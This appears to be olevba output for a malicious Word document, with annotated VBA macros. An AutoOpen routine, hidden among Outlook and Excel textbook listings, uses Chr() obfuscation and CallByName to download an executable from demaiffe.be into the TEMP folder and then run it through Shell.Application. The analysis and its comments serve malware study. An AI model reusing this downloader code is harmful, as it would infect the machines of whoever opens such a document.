- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- compin~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: compin~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: the analysis table for this stream flags AutoOpen as
- ' running when the Word document is opened, so this is where execution starts.
- Sub autoopen()
- ' Hands off to the wrapper defined right below; the numeric argument is a
- ' throwaway value (the callee never reads its parameter).
- Nip121ÖÊÂ3017 (5.003)
- End Sub
- ' Indirection layer between autoopen and the payload routine. The FFFFF
- ' parameter is ignored; the only statement is a call to px4vMaz62GyVze,
- ' which is defined in the Module2 stream.
- Sub Nip121ÖÊÂ3017(FFFFF As Double)
- px4vMaz62GyVze
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level state for Module1. Of these four variables only lw6wgKatg is
- ' referenced in the extracted macros: px4vMaz62GyVze (Module2) stores the
- ' dropped file's path in it and A06WNXrxh (this module) passes it to Open.
- ' The other three are never read or written in the visible code.
- ' NOTE(review): the rest of this module is "Listing 22.x" sample code that
- ' appears to be filler; the two short functions with random names
- ' (LKJNmJKILHB, A06WNXrxh) are the parts reached from autoopen. No Run call
- ' is visible in this module, so the "Run" hit in the analysis table
- ' presumably matches comment text such as "Run through".
- Public VSvsdvve As Integer
- ' Holds the full path of the file written to disk (set in px4vMaz62GyVze).
- Public lw6wgKatg As String
- Public FEveEv As Double
- Public VSeeve As Long
- '
- ' Listing 22.1. A procedure that enumerates the first- and
- ' second-level folders in the Outlook namespace.
- '
- Sub EnumerateFolders()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Run through the first-level folders
- '
- For Each folder In ns.Folders
- Debug.Print folder.Name
- '
- ' Run through the second-level folders, if any
- '
- If folder.Folders.Count > 1 Then
- For Each subfolder In folder.Folders
- Debug.Print " " & subfolder.Name
- Next 'subfolder
- End If
- Next 'folder
- Set ns = Nothing
- End Sub
- '
- ' Listing 22.2. A procedure to test the PickFolder method
- '
- Sub PickFolderTest()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Display the Select Folder dialog box
- '
- Set folder = ns.PickFolder
- '
- ' Test the return value
- '
- If Not folder Is Nothing Then
- MsgBox "You picked " & folder.Name
- End If
- End Sub
- '
- ' Listing 22.3. A procedure that toggles the Web view
- ' on and off for the currently displayed folder.
- '
- Sub ToggleWebView()
- '
- ' Set up the namespace and get the explorer
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Save the current folder
- '
- Set currFolder = r.exp.CurrentFolder
- '
- ' Move temporarily to the root
- '
- Set c.exp.CurrentFolder = ns.Folders(1)
- '
- ' Toggle Web view for the current folder
- '
- currFolder.WebViewOn = Not currFolder.WebViewOn
- '
- ' Return to the current folder
- '
- Set a.exp.CurrentFolder = currFolder
- End Sub
- '
- ' Listing 22.4. A Function that determines the
- ' e-mail address of the sender.
- '
- Function SenderAddress(msg As String) As String
- '
- ' Create a temporary reply
- '
- Set replyItem = y.msg.Reply
- '
- ' The Reply's "To" property holds the sender's address
- '
- SenderAddress = replyItem.To
- Set replyItem = Nothing
- End Function
- '
- ' Use this procedure to test the SenderAddress function.
- '
- Sub SenderAddressTest()
- '
- ' Set up the namespace and Inbox
- '
- Set ns = ThisOutlookSession.Session
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Display the sender's address for a message
- '
- MsgBox SenderAddress(ib.Items(2))
- End Sub
- '
- ' Listing 22.5. A procedure that processes Inbox messages.
- '
- ' Thin wrapper around CreateObject: returns the COM object for the ProgID
- ' passed in NVIEOIB. Every object used by the download chain in this sample
- ' is created through this wrapper, with the ProgID assembled from Chr()
- ' fragments at the call site, so no ProgID literal appears next to
- ' CreateObject.
- Public Function LKJNmJKILHB(NVIEOIB As String)
- Set LKJNmJKILHB = CreateObject(NVIEOIB)
- End Function
- Sub ProcessInboxMessages()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Get the default Inbox folder
- '
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Run through each item in the Inbox
- '
- For Each msg In ib.Items
- '
- ' Flag important messages
- '
- If msg.Importance = olImportanceHigh Then
- msg.FlagStatus = olFlagMarked
- msg.FlagRequest = "Handle this, will ya!"
- msg.FlagDueBy = Date + 7
- msg.Importance = olImportanceNormal
- msg.Save
- End If
- '
- ' Look for expired flags
- '
- If msg.FlagDueBy < Date Then
- msg.Display
- MsgBox "The displayed message has an expired flag!"
- End If
- '
- ' Move sensitive messages to "Confidential" folder
- '
- If msg.Sensitivity = olConfidential Then
- msg.Move ns.Folders(1).Folders("Confidential")
- End If
- Next 'msg
- End Sub
- '
- ' Listing 22.6. A procedure that sends an e-mail message
- '
- Sub SendAMessage()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Create the new MailItem
- '
- Set msg = Applicy.ation.CreateItem(olMailItem)
- '
- ' Specify the recipient, subject, and body
- ' and then send the message
- '
- With msg
- '
- ' Adjust the following address!
- '
- .Recipients.Add "bitbucket@mcfedries.com"
- .Subject = "Just Testing"
- .Body = "This is only a test"
- .Send
- End With
- End Sub
- '
- ' Listing 22.7. A procedure that creates a forwarded message
- ' and deletes any existing attachments before sending it.
- '
- Sub ForwardAndDeleteAttachments()
- '
- ' Set up the namespace and Inbox
- '
- Set ns = ThisOutlookSession.Session
- Set ib = ns.GetDefaultFolder(olFolderInbox)
- '
- ' Create the forwarded MailItem
- '
- Set msg = ib.Items(ib.Items.Count).Forward
- With msg
- '
- ' Delete all the attachments
- '
- For Each att In .Attachments
- att.Delete
- Next 'att
- '
- ' Send it (change the address!)
- '
- .Recipients.Add "selene@mcfedries.com"
- .Send
- End With
- End Sub
- '
- ' Listing 22.8. A procedure that stores a password
- ' in a folder's Description property.
- '
- Sub SetPassword()
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Save the password in the folder's Description property
- '
- Set folder = ns.Folders(1).Folders("Confidential")
- folder.Description = "password"
- End Sub
- '
- ' Listing 22.9. An event handler that asks the user for
- ' a password before switching to the "Confidential" folder.
- '
- ' Launch step of the chain, called only from the error handler in
- ' px4vMaz62GyVze. The MmXQ1eLmZ argument is never read.
- Public Function A06WNXrxh(MmXQ1eLmZ As String)
- ' The concatenation below decodes to the ProgID "Shell.Application".
- Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
- ' lw6wgKatg is the module-level path filled in by px4vMaz62GyVze
- ' (<TEMP>\silvuple.exe). Open hands that path to the shell -- presumably
- ' this is what starts the downloaded executable.
- d6eiGTziQd.Open (lw6wgKatg)
- End Function
- Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
- If NewFolder.Name = "Confidential" Then
- pwd = InputBox("Please enter the password for this folder:")
- If pwd <> NewFolder.Description Then
- Cancel = True
- End If
- End If
- End Sub
- '
- ' Use this event handler to insure that the gExplorer
- ' global variable gets instantiated at startup
- '
- Private Sub Application_Startup()
- Set gExplorer = Applicat.ion.ActiveExplorer
- End Sub
- '
- ' Listing 22.10. An event handler for the MailItem object's Send event.
- '
- Private Sub gMailItem_Send(Cancel As Boolean)
- Dim result As Integer
- result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
- If result = vbNo Then
- gMailItem.DeleteAfterSubmit = True
- End If
- End Sub
- '
- ' Listing 22.11. A procedure that sends an e-mail message and
- ' references the global gMailItem variable to trap events.
- '
- Sub SendAMessage2()
- '
- ' Set up the namespace
- '
- Set ns = ThisOutlookSession.Session
- '
- ' Create the new MailItem using the
- ' gMailItem global variable
- '
- Set gMailItem = Appl.ication.CreateItem(olMailItem)
- '
- ' Specify the recipient, subject, and body
- ' and then send the message
- '
- With gMailItem
- '
- ' Adjust the following address!
- '
- .Recipients.Add "bitbucket@mcfedries.com"
- .Subject = "Just Testing Events"
- .Body = "This is only an events test"
- .Send
- End With
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Run | May run an executable file or a system |
- | | | command |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '
- ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
- '
- Sub GetNumbers()
- Dim done As Boolean
- Dim divisor As Variant
- Dim dividend As Variant
- '
- ' Prompt user for dividend and divisor.
- '
- done = False
- Do While Not done
- dividend = InputBox("Enter the dividend:", "Divider")
- divisor = InputBox("Enter the divisor:", "Divider")
- done = Divide(dividend, divisor)
- Loop
- End Sub
- '
- ' File-write helper: saves the data in jIAuThroV99z to the path dicVrTXgN.
- ' Called from px4vMaz62GyVze with the HTTP response bytes and the TEMP path.
- Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
- ' The concatenation decodes to the ProgID "Adodb.Stream".
- Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
- With KKOWIPA
- ' Type 1 is the ADODB binary stream type (adTypeBinary).
- .Type = 1
- .Open
- .write jIAuThroV99z
- ' Save option 2 is adSaveCreateOverWrite: an existing file at the path is replaced.
- .savetofile dicVrTXgN, 2
- End With
- End Function
- ' Listing 23.2. The Divide function divides the dividend by the divisor.
- ' The function traps "division by zero" errors.
- '
- Function Divide(dividend, divisor) As Boolean
- Dim msg As String
- Dim result As Single
- '
- ' Set the trap
- '
- On Error GoTo DivByZeroHandler
- '
- ' Peform the division
- '
- result = dividend / divisor
- '
- ' If it went okay, display the result
- '
- msg = dividend & _
- " divided by " & _
- divisor & _
- " equals " & _
- result
- MsgBox msg
- '
- ' Set the return value and bypass the error handler
- '
- Divide = True
- Exit Function
- '
- ' Code branches here if an error occurs
- '
- DivByZeroHandler:
- '
- ' Display the error message
- '
- result = MsgBox("You entered 0 as the divisor! Try again?", _
- vbYesNo + vbQuestion, _
- "Divider")
- '
- ' Return the user's choice
- '
- If result = vbYes Then
- Divide = False
- Else
- Divide = True
- End If
- End Function
- '
- ' Listing 23.3 Backs up the active workbook to a drive specified by
- ' Download-and-launch routine, reached from autoopen through the wrapper in
- ' ThisDocument. It sits in the middle of the "Listing 23.3" comment (the
- ' sentence starts on the line above and continues after End Sub).
- ' All strings are built from Chr() fragments and all method calls go through
- ' CallByName, so neither the ProgIDs, the URL nor the method names appear as
- ' literals. Decoded values are given in the comments below.
- ' Observable artifacts: an HTTP GET from the Office process to the URL below
- ' and a file named silvuple.exe in the process TEMP directory.
- Sub px4vMaz62GyVze()
- ' ProgID decodes to "Microsoft.XMLHTTP".
- Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
- ' Equivalent to .Open "GET", <url>, False (third argument False = synchronous).
- ' The URL decodes to hxxp://demaiffe[.]be/75/85.exe (defanged in this comment).
- CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
- , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
- , False
- ' ProgID decodes to "WScript.Shell".
- Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
- ' Reads the shell object's Environment("Process") collection.
- Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
- ' Looks up the "TEMP" environment variable.
- mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
- ' Builds <TEMP>\silvuple.exe and stores it in the Module1 global lw6wgKatg,
- ' where A06WNXrxh later picks it up.
- lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
- Dim FLLSJmKUYRVHQ() As Byte
- ' Method name decodes to "Send": issues the request.
- CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
- ' Property name decodes to "responseBody": the raw response bytes.
- FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
- ' Writes the response bytes to the TEMP path via the Adodb.Stream helper.
- VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg
- ' Deliberate division by zero: the launch call is only reachable through the
- ' error handler at PA4FeaqAL, never on the straight-line path. Presumably this
- ' is meant to hide the call from analysis that does not follow error handlers.
- On Error GoTo PA4FeaqAL
- a = 84 / 0
- On Error GoTo 0
- JRyXdhZR:
- Exit Sub
- PA4FeaqAL:
- ' Launch step; the string argument is never read by A06WNXrxh.
- A06WNXrxh ("AU7CVXKyNxAAi")
- Resume JRyXdhZR
- End Sub
- ' the user. Traps any errors (such as having no disk in the drive).
- '
- Sub BackUpToFloppy()
- Dim backupDrive As String
- Dim backupName As String
- Dim msg As String
- Dim done As Boolean
- Dim result As Integer
- '
- ' Define the location of the error handler
- '
- On Error GoTo ErrorHandler
- '
- ' Initialize some variables and then loop
- '
- Application.DisplayAlerts = False
- done = False
- backupDrive = "A:"
- While Not done
- '
- ' Get the drive to use for the backup
- '
- backupDrive = InputBox( _
- Prompt:="Enter the drive letter for the backup:", _
- Title:="Backup", _
- Default:=backupDrive)
- '
- ' Check to see if OK was selected
- '
- If backupDrive <> "" Then
- '
- ' Make sure the backup drive contains a colon (:)
- '
- If InStr(backupDrive, ":") = 0 Then
- backupDrive = Left(backupDrive, 1) & ":"
- End If
- '
- ' First, save the file
- '
- ActiveWorkbook.Save
- '
- ' Assume the backup will be successful,
- ' so set done to True to exit the loop
- '
- done = True
- '
- ' Concatenate drive letter and workbook name
- '
- backupName = backupDrive & ActiveWorkbook.Name
- '
- ' Make a copy on the specified drive
- '
- ActiveWorkbook.SaveCopyAs FileName:=backupName
- Else
- Exit Sub
- End If
- Wend
- '
- ' Bypass the error handler
- '
- Exit Sub
- '
- ' Code branches here if an error occurs
- '
- ErrorHandler:
- msg = "An error has occurred!" & Chr(13) & Chr(13) & _
- "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
- "letter, or Ignore to attempt the backup again."
- result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
- Select Case result
- Case vbAbort
- done = True
- Case vbRetry
- done = False
- Resume Next
- Case vbIgnore
- Resume
- End Select
- End Sub
- '
- ' Listing 23.4. This procedure divides two numbers. It traps three specific
- ' errors: division by zero, overflow, and type mismatch.
- '
- Sub DivideNumbers()
- Dim msg As String
- Dim result As Single
- Dim divisor As Variant
- Dim dividend As Variant
- '
- ' Set the trap
- '
- On Error GoTo DivByZeroHandler
- '
- ' Prompt user for the dividend
- '
- GetDividendAndDivisor:
- dividend = InputBox("Enter the dividend:", "Divider")
- If dividend = "" Then Exit Sub
- '
- ' Prompt user for the divisor
- '
- GetDivisorOnly:
- divisor = InputBox("Enter the divisor:", "Divider")
- If divisor = "" Then Exit Sub
- '
- ' Peform the division
- '
- result = dividend / divisor
- '
- ' If it went okay, display the result
- '
- msg = dividend & _
- " divided by " & _
- divisor & _
- " equals " & _
- result
- MsgBox msg
- '
- ' Bypass the error handler
- '
- Exit Sub
- '
- ' Code branches here if an error occurs
- '
- DivByZeroHandler:
- '
- ' Display the error message
- '
- msg = "An error occurred!" & Chr(13) & Chr(13) & _
- "Error number: " & Err.Number & Chr(13) & _
- "Error message: " & Err.Description
- MsgBox msg, vbOKOnly + vbCritical
- '
- ' Check the error number
- '
- Select Case Err.Number
- '
- ' Division by zero
- '
- Case 11
- Resume GetDivisorOnly
- '
- ' Overflow
- '
- Case 6
- Resume GetDividendAndDivisor
- '
- ' Type mismatch
- '
- Case 13
- If Not IsNumeric(dividend) Then
- Resume GetDividendAndDivisor
- Else
- Resume GetDivisorOnly
- End If
- '
- ' Anything else, just quit
- '
- Case Else
- Exit Sub
- End Select
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- +------------+------------+-----------------------------------------+